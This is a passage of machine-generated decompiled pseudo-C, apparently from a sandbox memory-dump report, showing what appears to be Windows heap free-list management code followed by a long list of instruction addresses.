																						_t645 = _t645 ^  *(_t670 + 0x50);
																						__eflags = _t645;
																					}
																					_t643 = _t645 & 0x0000ffff;
																				}
																				__eflags = ( *_t671 & 0x0000ffff) - (_t643 & 0x0000ffff);
																				if(( *_t671 & 0x0000ffff) - (_t643 & 0x0000ffff) > 0) {
																					L148:
																					__eflags = _t590;
																					if(_t590 == 0) {
																						_t592 = _v28;
																						_t642 =  *((intOrPtr*)(_t475 + 0x1c)) + (_t592 >> 5) * 4;
																						 *_t642 =  *_t642 | 1 << (_t592 & 0x0000001f);
																						__eflags =  *_t642;
																					}
																					goto L150;
																				} else {
																					goto L147;
																				}
																			}
																		}
																		_t475 = _t636;
																	}
																	_t638 = _t586;
																	goto L136;
																}
															}
															_t646 =  *(_t670 + 0x4c);
															while(1) {
																__eflags = _t646;
																if(_t646 == 0) {
																	_t595 =  *(_t472 - 8) & 0x0000ffff;
																} else {
																	_t597 =  *(_t472 - 8);
																	_t646 =  *(_t670 + 0x4c);
																	__eflags = _t646 & _t597;
																	if((_t646 & _t597) != 0) {
																		_t597 = _t597 ^  *(_t670 + 0x50);
																		__eflags = _t597;
																	}
																	_t595 = _t597 & 0x0000ffff;
																}
																__eflags = _v20 - (_t595 & 0x0000ffff);
																if(_v20 <= (_t595 & 0x0000ffff)) {
																	goto L126;
																}
																_t472 =  *_t472;
																__eflags = _t539 - _t472;
																if(_t539 != _t472) {
																	continue;
																}
																goto L126;
															}
															goto L126;
														}
														_t467 =  *_a4;
														_t537 = _v20;
														_t584 = _t467 + 0x14;
														_t630 =  *_t584;
														_v28 = _t630;
														_a4 = _t467;
														_v16 = _t630 -  *_t584;
														_t632 =  *((intOrPtr*)(_t467 + 0x18));
														_t468 =  *((intOrPtr*)(_t632 + 4));
														_v12 = _t632;
														__eflags = _t632 - _t468;
														if(_t632 != _t468) {
															goto L78;
														}
														goto L77;
														L78:
														_t633 =  *(_t670 + 0x4c);
														__eflags = _t633;
														if(_t633 == 0) {
															_t469 =  *(_t468 - 8) & 0x0000ffff;
														} else {
															_t514 =  *(_t468 - 8);
															_t633 =  *(_t670 + 0x4c);
															__eflags = _t514 & _t633;
															if((_t514 & _t633) != 0) {
																_t514 = _t514 ^  *(_t670 + 0x50);
																__eflags = _t514;
															}
															_t469 = _t514 & 0x0000ffff;
														}
														_t471 = _v12;
														__eflags = _t537 - (_t469 & 0x0000ffff);
														if(_t537 - (_t469 & 0x0000ffff) > 0) {
															L119:
															_v8 = _t471;
															goto L121;
														} else {
															_t486 =  *_t471 - 8;
															__eflags = _t633;
															if(_t633 == 0) {
																_t487 =  *_t486 & 0x0000ffff;
															} else {
																_t513 =  *_t486;
																_t633 =  *(_t670 + 0x4c);
																__eflags = _t513 & _t633;
																if((_t513 & _t633) != 0) {
																	_t513 = _t513 ^  *(_t670 + 0x50);
																	__eflags = _t513;
																}
																_t487 = _t513 & 0x0000ffff;
															}
															__eflags = _v20 - (_t487 & 0x0000ffff);
															if(_v20 - (_t487 & 0x0000ffff) > 0) {
																_t489 = _a4;
																__eflags =  *_t489;
																if( *_t489 != 0) {
																	L105:
																	_t490 = _a4;
																	_t549 = _v16 >> 5;
																	_v12 =  *((intOrPtr*)(_t490 + 0x1c)) + _t549 * 4;
																	_t650 = ( *((intOrPtr*)(_t490 + 4)) -  *_t584 >> 5) - 1;
																	_t498 =  !((1 << (_v16 & 0x0000001f)) - 1) &  *_v12;
																	__eflags = 1;
																	if(1 != 0) {
																		L109:
																		__eflags = _t498 & 0x0000ffff;
																		if((_t498 & 0x0000ffff) == 0) {
																			_t604 = _t498 >> 0x00000010 & 0x000000ff;
																			__eflags = _t604;
																			if(_t604 == 0) {
																				_t171 = (_t498 >> 0x18) + 0xb537f8; // 0x10008
																				_t501 = ( *_t171 & 0x000000ff) + 0x18;
																				__eflags = _t501;
																			} else {
																				_t170 = _t604 + 0xb537f8; // 0x10008
																				_t501 = ( *_t170 & 0x000000ff) + 0x10;
																			}
																		} else {
																			_t652 = _t498 & 0x000000ff;
																			__eflags = _t652;
																			if(_t652 == 0) {
																				_t169 = (_t498 >> 0x00000008 & 0x000000ff) + 0xb537f8; // 0x10008
																				_t501 = ( *_t169 & 0x000000ff) + 8;
																			} else {
																				_t168 = _t652 + 0xb537f8; // 0x10008
																				_t501 =  *_t168 & 0x000000ff;
																			}
																		}
																		_t551 = (_t549 << 5) + _t501;
																		_t502 = _a4;
																		__eflags =  *(_t502 + 8);
																		_t605 = _t551 + _t551;
																		if( *(_t502 + 8) == 0) {
																			_t605 = _t551;
																		}
																		_t471 =  *( *((intOrPtr*)(_t502 + 0x20)) + _t605 * 4);
																		goto L119;
																	} else {
																		goto L106;
																	}
																	while(1) {
																		L106:
																		__eflags = _t549 - _t650;
																		if(_t549 > _t650) {
																			break;
																		}
																		_v12 =  &(_v12[1]);
																		_t498 =  *_v12;
																		_t549 = _t549 + 1;
																		__eflags = _t498;
																		if(_t498 == 0) {
																			continue;
																		}
																		break;
																	}
																	__eflags = _t498;
																	if(_t498 == 0) {
																		_t179 =  &_v8;
																		 *_t179 = _v8 & 0x00000000;
																		__eflags =  *_t179;
																		goto L121;
																	}
																	goto L109;
																}
																__eflags = _v28 - _t489[1] - 1;
																if(_v28 != _t489[1] - 1) {
																	goto L105;
																}
																_t607 = _a4;
																__eflags =  *(_t607 + 8);
																_t511 = _v16;
																if( *(_t607 + 8) != 0) {
																	_t511 = _t511 + _t511;
																	__eflags = _t511;
																}
																_t471 =  *( *((intOrPtr*)(_t607 + 0x20)) + _t511 * 4);
																while(1) {
																	__eflags = _v12 - _t471;
																	if(_v12 == _t471) {
																		goto L121;
																	}
																	__eflags = _t633;
																	if(_t633 == 0) {
																		_t609 =  *(_t471 - 8) & 0x0000ffff;
																	} else {
																		_t611 =  *(_t471 - 8);
																		_t633 =  *(_t670 + 0x4c);
																		__eflags = _t611 & _t633;
																		if((_t611 & _t633) != 0) {
																			_t611 = _t611 ^  *(_t670 + 0x50);
																			__eflags = _t611;
																		}
																		_t609 = _t611 & 0x0000ffff;
																	}
																	__eflags = _v20 - (_t609 & 0x0000ffff);
																	if(_v20 - (_t609 & 0x0000ffff) <= 0) {
																		goto L119;
																	} else {
																		_t471 =  *_t471;
																		continue;
																	}
																	goto L105;
																}
																goto L121;
															} else {
																_t471 =  *_v12;
																goto L119;
															}
														}
													}
												}
												_t467 = _t583;
											}
											_t630 = _t537;
											_v28 = _t537;
											goto L75;
										}
										_t472 =  *(_t670 + 0xc4);
										goto L64;
									}
									_t515 = E00B761FE(_t671, __eflags);
									__eflags = _t515;
									if(_t515 != 0) {
										goto L62;
									}
									E00B6EE4C(_t536, _t670, _t670, _t671,  *_t671 & 0x0000ffff, 1);
									goto L174;
								}
								_t613 =  *_t671 & 0x0000ffff;
								while(1) {
									__eflags = _t613 -  *(_t465 + 4);
									if(_t613 <  *(_t465 + 4)) {
										break;
									}
									_t654 =  *_t465;
									__eflags = _t654;
									if(_t654 == 0) {
										_t536 =  *(_t465 + 4) - 1;
										__eflags = _t536;
										_a4 = _t536;
										L37:
										_t615 = _t536 -  *((intOrPtr*)(_t465 + 0x14));
										__eflags =  *(_t465 + 8);
										_v20 = _t615;
										if( *(_t465 + 8) != 0) {
											_t615 = _t615 + _t615;
											__eflags = _t615;
										}
										_t616 = _t615 << 2;
										_t656 =  *((intOrPtr*)(_t465 + 0x20)) + _t616;
										_v28 = _t616;
										 *((intOrPtr*)(_t465 + 0xc)) =  *((intOrPtr*)(_t465 + 0xc)) - 1;
										_v16 =  *_t656;
										__eflags = _t536 -  *(_t465 + 4) - 1;
										if(_t536 ==  *(_t465 + 4) - 1) {
											_t69 = _t465 + 0x10;
											 *_t69 =  *(_t465 + 0x10) - 1;
											__eflags =  *_t69;
										}
										__eflags = _v16 - _t671 + 8;
										if(_v16 != _t671 + 8) {
											goto L58;
										} else {
											__eflags =  *_t465;
											_t621 =  *(_t465 + 4);
											if( *_t465 == 0) {
												_t621 = _t621 - 1;
												__eflags = _t621;
											}
											__eflags = _a4 - _t621;
											_t622 =  *(_t671 + 8);
											if(_a4 >= _t621) {
												__eflags = _t622 -  *((intOrPtr*)(_t465 + 0x18));
												if(_t622 ==  *((intOrPtr*)(_t465 + 0x18))) {
													 *_t656 =  *_t656 & 0x00000000;
													__eflags =  *_t656;
													goto L57;
												}
												 *_t656 = _t622;
												goto L58;
											} else {
												__eflags = _t622 -  *((intOrPtr*)(_t465 + 0x18));
												if(_t622 ==  *((intOrPtr*)(_t465 + 0x18))) {
													L53:
													 *(_v28 +  *((intOrPtr*)(_t465 + 0x20))) =  *(_v28 +  *((intOrPtr*)(_t465 + 0x20))) & 0x00000000;
													L57:
													_t623 = _v20;
													_t519 =  *((intOrPtr*)(_t465 + 0x1c)) + (_t623 >> 5) * 4;
													 *_t519 =  *_t519 &  !(1 << (_t623 & 0x0000001f));
													__eflags =  *_t519;
													goto L58;
												}
												__eflags =  *(_t670 + 0x4c);
												if( *(_t670 + 0x4c) == 0) {
													_t664 =  *(_t622 - 8) & 0x0000ffff;
												} else {
													_t667 =  *(_t622 - 8);
													__eflags =  *(_t670 + 0x4c) & _t667;
													if(( *(_t670 + 0x4c) & _t667) != 0) {
														_t667 = _t667 ^  *(_t670 + 0x50);
														__eflags = _t667;
													}
													_t664 = _t667 & 0x0000ffff;
												}
												_t536 = ( *_t671 & 0x0000ffff) != (_t664 & 0x0000ffff);
												__eflags = ( *_t671 & 0x0000ffff) != (_t664 & 0x0000ffff);
												if(( *_t671 & 0x0000ffff) != (_t664 & 0x0000ffff)) {
													goto L53;
												} else {
													 *(_v28 +  *((intOrPtr*)(_t465 + 0x20))) = _t622;
													goto L58;
												}
											}
										}
									}
									_t465 = _t654;
								}
								_t536 = _t613;
								_a4 = _t613;
								goto L37;
							}
						}
						if(_a28 == _t532) {
							L19:
							if(( *(_t671 + 2) & 0x00000004) == 0 || E00BD579A(_t568, _t670, _t671) != 0) {
								goto L155;
							} else {
								goto L183;
							}
						} else {
							if((_t380 & 0x00000002) == 0) {
								_t523 =  *(_t671 + 3) & 0xff;
							} else {
								_t523 =  *(E00B72568(_t671) + 2) & 0x0000ffff;
							}
							if(_t523 == _t532) {
								goto L19;
							}
							if((_t523 & 0x00008000) == 0) {
								__eflags = _t523 & 0x00000800;
								if((_t523 & 0x00000800) != 0) {
									goto L19;
								}
								__eflags = _t523 -  *((intOrPtr*)(_t670 + 0x88));
								if(_t523 >=  *((intOrPtr*)(_t670 + 0x88))) {
									goto L19;
								}
								_t626 = _a28;
								L18:
								_t568 =  *_t671 & 0x0000ffff;
								 *((intOrPtr*)(_t626 + (_t523 & 0x0000ffff) * 4)) =  *((intOrPtr*)(_t626 + (_t523 & 0x0000ffff) * 4)) + ( *_t671 & 0x0000ffff);
								goto L19;
							}
							_t523 = _t523 & 0x00007fff;
							_t568 = 0x81;
							if(_t523 >= 0x81) {
								goto L19;
							} else {
								_t626 = _a32;
								goto L18;
							}
						}
						L174:
						__eflags = _t671 -  *((intOrPtr*)(_a8 + 0x28));
					} while (__eflags < 0);
					_t671 = _a8;
					_t339 = 0;
					__eflags = 0;
					goto L176;
				}
			}














































































































                                                        0x00befde7
                                                        0x00befdea
                                                        0x00befded
                                                        0x00befdf0
                                                        0x00befdf3
                                                        0x00befdf9
                                                        0x00bf0465
                                                        0x00bf0465
                                                        0x00bf0468
                                                        0x00bf046b
                                                        0x00bf06a2
                                                        0x00bf06a5
                                                        0x00bf06a8
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf06b5
                                                        0x00bf06b8
                                                        0x00bf06bb
                                                        0x00bf06dd
                                                        0x00bf06e2
                                                        0x00bf06bd
                                                        0x00bf06d5
                                                        0x00bf06da
                                                        0x00bf06e8
                                                        0x00bf06e9
                                                        0x00bf06ec
                                                        0x00bf06ed
                                                        0x00bf0695
                                                        0x00bf0695
                                                        0x00000000
                                                        0x00bf069a
                                                        0x00bf0478
                                                        0x00bf047b
                                                        0x00bf047e
                                                        0x00bf0680
                                                        0x00bf0685
                                                        0x00bf0484
                                                        0x00bf049c
                                                        0x00bf04a1
                                                        0x00bf068b
                                                        0x00bf068c
                                                        0x00bf068f
                                                        0x00bf0690
                                                        0x00000000
                                                        0x00befdff
                                                        0x00befdff
                                                        0x00befe02
                                                        0x00befe05
                                                        0x00befe07
                                                        0x00befe0c
                                                        0x00befe11
                                                        0x00befe1b
                                                        0x00befe1e
                                                        0x00befe20
                                                        0x00befe21
                                                        0x00befe22
                                                        0x00befe23
                                                        0x00befe23
                                                        0x00befe1e
                                                        0x00befe34
                                                        0x00bf04ad
                                                        0x00bf04b0
                                                        0x00bf04b3
                                                        0x00bf04d5
                                                        0x00bf04da
                                                        0x00bf04b5
                                                        0x00bf04cd
                                                        0x00bf04d2
                                                        0x00bf04e8
                                                        0x00bf04ed
                                                        0x00bf04ed
                                                        0x00bf04ef
                                                        0x00bf04f6
                                                        0x00bf04fe
                                                        0x00bf04fe
                                                        0x00bf0501
                                                        0x00bf0501
                                                        0x00bf050b
                                                        0x00bf0511
                                                        0x00bf0511
                                                        0x00bf0513
                                                        0x00000000
                                                        0x00bf0513
                                                        0x00befe3a
                                                        0x00befe40
                                                        0x00befe43
                                                        0x00befe4b
                                                        0x00befe4e
                                                        0x00befe53
                                                        0x00befece
                                                        0x00befed2
                                                        0x00bf0383
                                                        0x00bf0386
                                                        0x00bf038b
                                                        0x00bf038e
                                                        0x00bf038e
                                                        0x00bf0390
                                                        0x00bf0390
                                                        0x00bf0393
                                                        0x00bf0395
                                                        0x00bf03ad
                                                        0x00bf0397
                                                        0x00bf03a6
                                                        0x00bf03a6
                                                        0x00bf03af
                                                        0x00bf03b2
                                                        0x00bf03b4
                                                        0x00bf0576
                                                        0x00bf0579
                                                        0x00bf057c
                                                        0x00bf059e
                                                        0x00bf05a3
                                                        0x00bf057e
                                                        0x00bf0596
                                                        0x00bf059b
                                                        0x00bf05ad
                                                        0x00bf05ae
                                                        0x00bf05af
                                                        0x00000000
                                                        0x00bf03ba
                                                        0x00bf03ba
                                                        0x00bf03be
                                                        0x00bf043c
                                                        0x00bf043f
                                                        0x00bf0449
                                                        0x00bf044f
                                                        0x00bf044f
                                                        0x00bf044f
                                                        0x00bf0451
                                                        0x00bf0451
                                                        0x00000000
                                                        0x00bf0451
                                                        0x00bf03c0
                                                        0x00bf03c3
                                                        0x00bf03c5
                                                        0x00bf05c1
                                                        0x00bf05c7
                                                        0x00bf05ca
                                                        0x00bf0613
                                                        0x00bf0616
                                                        0x00bf0620
                                                        0x00bf0626
                                                        0x00bf0626
                                                        0x00bf0626
                                                        0x00bf0628
                                                        0x00000000
                                                        0x00bf0628
                                                        0x00bf05d2
                                                        0x00bf05d5
                                                        0x00bf05d8
                                                        0x00bf05fa
                                                        0x00bf05ff
                                                        0x00bf05da
                                                        0x00bf05f2
                                                        0x00bf05f7
                                                        0x00bf0608
                                                        0x00bf060b
                                                        0x00bf060c
                                                        0x00bf05b4
                                                        0x00bf05b4
                                                        0x00000000
                                                        0x00bf05b9
                                                        0x00bf03cb
                                                        0x00bf03d1
                                                        0x00bf03d4
                                                        0x00bf03d7
                                                        0x00bf03e1
                                                        0x00bf03e7
                                                        0x00bf03e7
                                                        0x00bf03e7
                                                        0x00bf03ec
                                                        0x00bf03f0
                                                        0x00bf03f3
                                                        0x00bf0437
                                                        0x00bf0437
                                                        0x00000000
                                                        0x00bf03f5
                                                        0x00bf03f5
                                                        0x00bf03f8
                                                        0x00bf03fd
                                                        0x00bf0407
                                                        0x00bf040a
                                                        0x00bf040c
                                                        0x00bf040d
                                                        0x00bf040e
                                                        0x00bf040f
                                                        0x00bf040f
                                                        0x00bf040a
                                                        0x00bf0418
                                                        0x00bf041c
                                                        0x00bf0637
                                                        0x00bf063a
                                                        0x00bf063d
                                                        0x00bf065f
                                                        0x00bf0664
                                                        0x00bf063f
                                                        0x00bf0657
                                                        0x00bf065c
                                                        0x00bf0674
                                                        0x00bf0675
                                                        0x00bf0676
                                                        0x00000000
                                                        0x00bf0422
                                                        0x00bf0422
                                                        0x00bf0425
                                                        0x00bf042f
                                                        0x00bf0435
                                                        0x00bf0435
                                                        0x00bf0435
                                                        0x00000000
                                                        0x00bf0425
                                                        0x00bf041c
                                                        0x00bf03f3
                                                        0x00bf03b4
                                                        0x00befed8
                                                        0x00befeda
                                                        0x00000000
                                                        0x00000000
                                                        0x00befee3
                                                        0x00befee6
                                                        0x00befee8
                                                        0x00befeea
                                                        0x00befeed
                                                        0x00befeef
                                                        0x00befeef
                                                        0x00befeef
                                                        0x00befeed
                                                        0x00befef2
                                                        0x00befef4
                                                        0x00bf0371
                                                        0x00bf0376
                                                        0x00bf0379
                                                        0x00bf037b
                                                        0x00bf0520
                                                        0x00bf0523
                                                        0x00bf0527
                                                        0x00bf0549
                                                        0x00bf054e
                                                        0x00bf0529
                                                        0x00bf0541
                                                        0x00bf0546
                                                        0x00bf055b
                                                        0x00bf0562
                                                        0x00bf056a
                                                        0x00000000
                                                        0x00bf056a
                                                        0x00bf0381
                                                        0x00bf0381
                                                        0x00000000
                                                        0x00befefa
                                                        0x00befefa
                                                        0x00befefd
                                                        0x00beff00
                                                        0x00beff02
                                                        0x00beff05
                                                        0x00beff08
                                                        0x00beff0b
                                                        0x00beff0d
                                                        0x00beff0f
                                                        0x00bf002b
                                                        0x00bf002b
                                                        0x00bf002d
                                                        0x00bf002e
                                                        0x00bf002f
                                                        0x00bf0030
                                                        0x00bf0031
                                                        0x00bf0033
                                                        0x00000000
                                                        0x00bf0033
                                                        0x00beff15
                                                        0x00beff17
                                                        0x00000000
                                                        0x00000000
                                                        0x00beff1d
                                                        0x00beff23
                                                        0x00beff26
                                                        0x00beff28
                                                        0x00befffb
                                                        0x00befffb
                                                        0x00befffe
                                                        0x00bf0001
                                                        0x00bf0003
                                                        0x00bf0006
                                                        0x00bf000a
                                                        0x00bf003d
                                                        0x00bf003d
                                                        0x00bf0040
                                                        0x00bf0044
                                                        0x00bf0048
                                                        0x00bf004e
                                                        0x00bf0051
                                                        0x00bf0053
                                                        0x00bf0091
                                                        0x00bf0091
                                                        0x00bf0094
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0089
                                                        0x00bf008b
                                                        0x00bf008d
                                                        0x00bf00a0
                                                        0x00bf00a0
                                                        0x00bf00a1
                                                        0x00bf00a4
                                                        0x00bf00a4
                                                        0x00bf00a7
                                                        0x00bf00a9
                                                        0x00bf00ac
                                                        0x00bf00af
                                                        0x00bf00b2
                                                        0x00bf00b5
                                                        0x00bf00b8
                                                        0x00bf00ba
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf00bc
                                                        0x00bf00bc
                                                        0x00bf023c
                                                        0x00bf023c
                                                        0x00bf023f
                                                        0x00bf0241
                                                        0x00bf005b
                                                        0x00bf005b
                                                        0x00bf005b
                                                        0x00bf0061
                                                        0x00bf0063
                                                        0x00bf0272
                                                        0x00bf0272
                                                        0x00bf0275
                                                        0x00bf0277
                                                        0x00bf0279
                                                        0x00bf028a
                                                        0x00bf028c
                                                        0x00bf028d
                                                        0x00bf028e
                                                        0x00bf028f
                                                        0x00bf0290
                                                        0x00bf0291
                                                        0x00bf0293
                                                        0x00bf027b
                                                        0x00bf027b
                                                        0x00bf027e
                                                        0x00bf0280
                                                        0x00bf0283
                                                        0x00bf0285
                                                        0x00bf0285
                                                        0x00bf029b
                                                        0x00bf029e
                                                        0x00bf02a4
                                                        0x00bf02a6
                                                        0x00bf0348
                                                        0x00bf0348
                                                        0x00bf034c
                                                        0x00bf035a
                                                        0x00bf0360
                                                        0x00bf0360
                                                        0x00000000
                                                        0x00bf02ac
                                                        0x00bf02ac
                                                        0x00bf02b9
                                                        0x00bf02b9
                                                        0x00bf02bc
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf02b1
                                                        0x00bf02b3
                                                        0x00bf02b5
                                                        0x00bf02c5
                                                        0x00bf02c5
                                                        0x00bf02c6
                                                        0x00bf02c8
                                                        0x00bf02cb
                                                        0x00bf02cf
                                                        0x00bf02d2
                                                        0x00bf02d4
                                                        0x00bf02d4
                                                        0x00bf02d4
                                                        0x00bf02d6
                                                        0x00bf02dc
                                                        0x00bf02df
                                                        0x00bf02e2
                                                        0x00bf02e9
                                                        0x00bf02ec
                                                        0x00bf02ee
                                                        0x00bf02f0
                                                        0x00bf02f0
                                                        0x00bf02f0
                                                        0x00bf02f0
                                                        0x00bf02f3
                                                        0x00bf02f5
                                                        0x00bf031d
                                                        0x00bf0326
                                                        0x00bf0329
                                                        0x00000000
                                                        0x00bf02f7
                                                        0x00bf02f7
                                                        0x00bf02fb
                                                        0x00bf030d
                                                        0x00bf02fd
                                                        0x00bf02fd
                                                        0x00bf0300
                                                        0x00bf0303
                                                        0x00bf0305
                                                        0x00bf0305
                                                        0x00bf0305
                                                        0x00bf0308
                                                        0x00bf0308
                                                        0x00bf0319
                                                        0x00bf031b
                                                        0x00bf032c
                                                        0x00bf032c
                                                        0x00bf032e
                                                        0x00bf0330
                                                        0x00bf033b
                                                        0x00bf0346
                                                        0x00bf0346
                                                        0x00bf0346
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf031b
                                                        0x00bf02f5
                                                        0x00bf02b7
                                                        0x00bf02b7
                                                        0x00bf02be
                                                        0x00000000
                                                        0x00bf02be
                                                        0x00bf02a6
                                                        0x00bf0069
                                                        0x00bf006c
                                                        0x00bf006c
                                                        0x00bf006e
                                                        0x00bf025c
                                                        0x00bf0074
                                                        0x00bf0074
                                                        0x00bf0077
                                                        0x00bf007a
                                                        0x00bf007c
                                                        0x00bf007e
                                                        0x00bf007e
                                                        0x00bf007e
                                                        0x00bf0081
                                                        0x00bf0081
                                                        0x00bf0263
                                                        0x00bf0266
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0268
                                                        0x00bf026a
                                                        0x00bf026c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf026c
                                                        0x00000000
                                                        0x00bf006c
                                                        0x00bf024a
                                                        0x00bf024c
                                                        0x00bf024f
                                                        0x00bf0252
                                                        0x00bf0254
                                                        0x00bf00a9
                                                        0x00bf00ac
                                                        0x00bf00af
                                                        0x00bf00b2
                                                        0x00bf00b5
                                                        0x00bf00b8
                                                        0x00bf00ba
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf00c4
                                                        0x00bf00c4
                                                        0x00bf00c7
                                                        0x00bf00c9
                                                        0x00bf00dd
                                                        0x00bf00cb
                                                        0x00bf00cb
                                                        0x00bf00ce
                                                        0x00bf00d1
                                                        0x00bf00d3
                                                        0x00bf00d5
                                                        0x00bf00d5
                                                        0x00bf00d5
                                                        0x00bf00d8
                                                        0x00bf00d8
                                                        0x00bf00e6
                                                        0x00bf00e9
                                                        0x00bf00eb
                                                        0x00bf0233
                                                        0x00bf0233
                                                        0x00000000
                                                        0x00bf00f1
                                                        0x00bf00f3
                                                        0x00bf00f6
                                                        0x00bf00f8
                                                        0x00bf010b
                                                        0x00bf00fa
                                                        0x00bf00fa
                                                        0x00bf00fc
                                                        0x00bf00ff
                                                        0x00bf0101
                                                        0x00bf0103
                                                        0x00bf0103
                                                        0x00bf0103
                                                        0x00bf0106
                                                        0x00bf0106
                                                        0x00bf0116
                                                        0x00bf0118
                                                        0x00bf0124
                                                        0x00bf0127
                                                        0x00bf012a
                                                        0x00bf0182
                                                        0x00bf0182
                                                        0x00bf0193
                                                        0x00bf0199
                                                        0x00bf01aa
                                                        0x00bf01ae
                                                        0x00bf01ae
                                                        0x00bf01b0
                                                        0x00bf01c8
                                                        0x00bf01cb
                                                        0x00bf01cd
                                                        0x00bf01f9
                                                        0x00bf01f9
                                                        0x00bf01ff
                                                        0x00bf0210
                                                        0x00bf0217
                                                        0x00bf0217
                                                        0x00bf0201
                                                        0x00bf0201
                                                        0x00bf0208
                                                        0x00bf0208
                                                        0x00bf01cf
                                                        0x00bf01d6
                                                        0x00bf01d6
                                                        0x00bf01d8
                                                        0x00bf01e8
                                                        0x00bf01ef
                                                        0x00bf01da
                                                        0x00bf01da
                                                        0x00bf01da
                                                        0x00bf01da
                                                        0x00bf01d8
                                                        0x00bf021d
                                                        0x00bf021f
                                                        0x00bf0222
                                                        0x00bf0226
                                                        0x00bf0229
                                                        0x00bf022b
                                                        0x00bf022b
                                                        0x00bf0230
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf01b2
                                                        0x00bf01b2
                                                        0x00bf01b2
                                                        0x00bf01b4
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf01b6
                                                        0x00bf01bd
                                                        0x00bf01bf
                                                        0x00bf01c0
                                                        0x00bf01c2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf01c2
                                                        0x00bf01c4
                                                        0x00bf01c6
                                                        0x00bf0238
                                                        0x00bf0238
                                                        0x00bf0238
                                                        0x00000000
                                                        0x00bf0238
                                                        0x00000000
                                                        0x00bf01c6
                                                        0x00bf0130
                                                        0x00bf0133
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0135
                                                        0x00bf0138
                                                        0x00bf013c
                                                        0x00bf013f
                                                        0x00bf0141
                                                        0x00bf0141
                                                        0x00bf0141
                                                        0x00bf0146
                                                        0x00bf0177
                                                        0x00bf0177
                                                        0x00bf017a
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf014b
                                                        0x00bf014d
                                                        0x00bf0161
                                                        0x00bf014f
                                                        0x00bf014f
                                                        0x00bf0152
                                                        0x00bf0155
                                                        0x00bf0157
                                                        0x00bf0159
                                                        0x00bf0159
                                                        0x00bf0159
                                                        0x00bf015c
                                                        0x00bf015c
                                                        0x00bf016d
                                                        0x00bf016f
                                                        0x00000000
                                                        0x00bf0175
                                                        0x00bf0175
                                                        0x00000000
                                                        0x00bf0175
                                                        0x00000000
                                                        0x00bf016f
                                                        0x00000000
                                                        0x00bf011a
                                                        0x00bf011d
                                                        0x00000000
                                                        0x00bf011d
                                                        0x00bf0118
                                                        0x00bf00eb
                                                        0x00bf00a7
                                                        0x00bf008f
                                                        0x00bf008f
                                                        0x00bf0096
                                                        0x00bf0098
                                                        0x00000000
                                                        0x00bf0098
                                                        0x00bf0055
                                                        0x00000000
                                                        0x00bf0055
                                                        0x00bf0010
                                                        0x00bf0015
                                                        0x00bf0017
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0021
                                                        0x00000000
                                                        0x00bf0021
                                                        0x00beff2e
                                                        0x00beff3b
                                                        0x00beff3b
                                                        0x00beff3e
                                                        0x00000000
                                                        0x00000000
                                                        0x00beff33
                                                        0x00beff35
                                                        0x00beff37
                                                        0x00beff4a
                                                        0x00beff4a
                                                        0x00beff4b
                                                        0x00beff4e
                                                        0x00beff50
                                                        0x00beff53
                                                        0x00beff57
                                                        0x00beff5a
                                                        0x00beff5c
                                                        0x00beff5c
                                                        0x00beff5c
                                                        0x00beff61
                                                        0x00beff64
                                                        0x00beff66
                                                        0x00beff6b
                                                        0x00beff6e
                                                        0x00beff75
                                                        0x00beff77
                                                        0x00beff79
                                                        0x00beff79
                                                        0x00beff79
                                                        0x00beff79
                                                        0x00beff7f
                                                        0x00beff82
                                                        0x00000000
                                                        0x00beff84
                                                        0x00beff84
                                                        0x00beff87
                                                        0x00beff8a
                                                        0x00beff8c
                                                        0x00beff8c
                                                        0x00beff8c
                                                        0x00beff8d
                                                        0x00beff90
                                                        0x00beff93
                                                        0x00beffd5
                                                        0x00beffd8
                                                        0x00beffde
                                                        0x00beffde
                                                        0x00000000
                                                        0x00beffde
                                                        0x00beffda
                                                        0x00000000
                                                        0x00beff95
                                                        0x00beff95
                                                        0x00beff98
                                                        0x00beffc9
                                                        0x00beffcf
                                                        0x00beffe1
                                                        0x00beffe1
                                                        0x00beffec
                                                        0x00befff9
                                                        0x00befff9
                                                        0x00000000
                                                        0x00befff9
                                                        0x00beff9a
                                                        0x00beff9e
                                                        0x00beffb0
                                                        0x00beffa0
                                                        0x00beffa0
                                                        0x00beffa3
                                                        0x00beffa6
                                                        0x00beffa8
                                                        0x00beffa8
                                                        0x00beffa8
                                                        0x00beffab
                                                        0x00beffab
                                                        0x00beffba
                                                        0x00beffba
                                                        0x00beffbc
                                                        0x00000000
                                                        0x00beffbe
                                                        0x00beffc4
                                                        0x00000000
                                                        0x00beffc4
                                                        0x00beffbc
                                                        0x00beff93
                                                        0x00beff82
                                                        0x00beff39
                                                        0x00beff39
                                                        0x00beff40
                                                        0x00beff42
                                                        0x00000000
                                                        0x00beff42
                                                        0x00befef4
                                                        0x00befe58
                                                        0x00befeb0
                                                        0x00befeb4
                                                        0x00000000
                                                        0x00befec9
                                                        0x00000000
                                                        0x00befec9
                                                        0x00befe5a
                                                        0x00befe5c
                                                        0x00befe6f
                                                        0x00befe5e
                                                        0x00befe64
                                                        0x00befe64
                                                        0x00befe75
                                                        0x00000000
                                                        0x00000000
                                                        0x00befe7c
                                                        0x00befe92
                                                        0x00befe97
                                                        0x00000000
                                                        0x00000000
                                                        0x00befe99
                                                        0x00befea0
                                                        0x00000000
                                                        0x00000000
                                                        0x00befea2
                                                        0x00befea5
                                                        0x00befeab
                                                        0x00befeae
                                                        0x00000000
                                                        0x00befeae
                                                        0x00befe7e
                                                        0x00befe83
                                                        0x00befe8b
                                                        0x00000000
                                                        0x00befe8d
                                                        0x00befe8d
                                                        0x00000000
                                                        0x00befe8d
                                                        0x00befe8b
                                                        0x00bf0454
                                                        0x00bf0457
                                                        0x00bf0457
                                                        0x00bf0460
                                                        0x00bf0463
                                                        0x00bf0463
                                                        0x00000000
                                                        0x00bf0463

                                                        Strings
                                                        Memory Dump Source
